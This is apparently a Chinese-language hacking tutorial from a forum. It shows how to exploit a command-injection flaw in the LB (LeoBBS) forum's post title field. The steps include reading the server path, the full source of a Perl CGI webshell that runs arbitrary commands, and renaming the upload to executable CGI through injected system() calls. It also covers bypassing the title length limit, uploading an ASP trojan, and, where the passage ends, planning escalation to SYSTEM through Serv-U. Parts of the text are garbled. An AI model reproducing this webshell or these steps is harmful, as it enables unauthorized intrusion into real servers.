内容: 目标服务器配置：/Windows2000/ /IIS5.0/ /MSSQL/ /MYSQL/ /SERV-U 4.0.1/ /ACTIVEPERL/ 服务器权限设置：EVERYONE /完全控制/ 服务器补丁情况：系统 /SP4/ MSSQL /SP3/ 其实这篇文章没有什么技术含量，只是想把一些好的思路跟大家分享出来！ 想必大家都知道LB论坛吧？我就不对其论坛及漏洞做过多的介绍了！ 首先我们来注册一个帐户，然后我们随便找个版块发表一个文章！ 在标题栏上输入and system('dir c:\')# OK！发表成功后，在地址栏处有相应文章ID http://127.0.0.1/cgi-bin/topic.cgi?forum=1&topic=1 我们修改连接地址然后在地址栏提交此URL，就会触发此漏洞！如下： http://127.0.0.1/cgi-bin/forum1/1.pl 呵呵，看到什么了吗？ ----------------------------- CGI Error The specified CGI application mi *** ehaved by not returning a complete set of HTTP headers. The headers it did return are: Can't find string terminator "'" anywhere before EOF at D:\bbs\cgi-bin\forum1\1.pl line 1. ----------------------------- 恩，这! 样我们就得到了论坛在目标服务器上的本地路径！ OK，接下来我们要通过此漏洞得到一个WEBSHELL，WEBSHELL的代码如下： #!/usr/bin/perl binmode(STDOUT); syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27); $_ = $ENV{QUERY_STRING}; s/%20/ /ig; s/%2f/\//ig; $execthis = $_; syswrite(STDOUT, "

\r\n", 13); open(STDERR, ">&STDOUT") ││ die "Can't redirect STDERR"; system($execthis); syswrite(STDOUT, "\r\n

\r\n", 17); close(STDERR); close(STDOUT); exit; 我们把它保存为*.txt文件！保存后，进帖子，我们上传，上传类型选择TXT！ 上传完毕后，我们看看这个小东东的地址是什么！ http://127.0.0.1/non-cgi/usr/1/1_1.txt 这就是我们的CGI网页木马了！我们通过标题栏来把这个txt文件改为*.cgi的！ 编辑自己的帖子！ and system('ren d:\bbs\non-cgi\usr\1\1_1.txt cmd.cgi')# 这里要说明一下！如果论坛的路径设置的很深（? 热纾篸:\webhost\www\website\host1\bbs\lb5000\non-cgi\usr\1\1_1! .txt） 我们就无法进行改名，因为标题栏处有限制，不可以超过40个汉字，路径太长！怎么办？别着急！看下面！ 我们先把编辑帖子的页面保存下来！用记事本打开保存的*.htm文件！找到提交标题栏的form表单！ /我们把action提交的页面修改成editpost.cgi在目标服务器的URL地址： / ……代码省略…… 　不得超过 40 个汉字 ……代码省略…… 这样就可以了，保存，双击打开它，然后点“发表”！就OK了！ 提交后我们来执行！ http://127.0.0.1/cgi-bin/forum1/1.pl 刷新一下就可以了！我们来看看有没有执行成功？！ http://127.0.0.1/non-cgi/usr/1/cmd.cgi 哈哈，是不是已经可以了？到此，我们就已经得到了一个WEBSHELL，我们来看看服务器? 那榭?br> http://127.0.0.1/non-cgi/usr/1/cmd.cgi?net start 有终端，且安装了SERV-U（据我了解70％以上的服务器都有安装它）这个软件说好也好，说不好也不好！ 好就好在它很实用，不好在于它的漏洞很多，这不！SERV-U5.0现在都可以溢出。。。建议大家都别用它了！ 继续！我对这个CGI的后门不太喜欢，所以，我这里用ASP的后门！用同样的 *** 来上传一个ASP后门（我用的是海阳顶端网ASP木马） http://127.0.0.1/non-cgi/usr/1/cmd.asp 呵呵！接下来我们利用SERV-U来获得SYSTEM权限的帐户！